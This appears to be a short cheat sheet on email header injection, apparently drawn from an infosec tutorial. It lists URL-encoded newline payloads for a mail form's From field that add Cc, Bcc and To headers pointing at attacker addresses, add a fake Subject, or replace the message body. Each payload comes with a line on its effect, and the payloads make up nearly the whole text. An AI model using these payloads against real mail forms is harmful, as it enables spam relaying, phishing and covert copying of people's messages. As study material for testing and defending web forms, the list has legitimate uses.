https://resources.infosecinstitute.com/email-injection/
From:[email protected]%0ACc:[email protected],%0ABcc:[email protected]
The message will be sent to the recipient and recipient1 accounts.
From:[email protected]%0ATo:[email protected]
The message will be sent to the original recipient and the attacker account.
From:[email protected]%0ASubject:This’s%20Fake%20Subject
The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.
Inject a two-line feed, then write your message to change the body of the message.
From:[email protected]%0A%0AMy%20New%20%0Fake%20Message.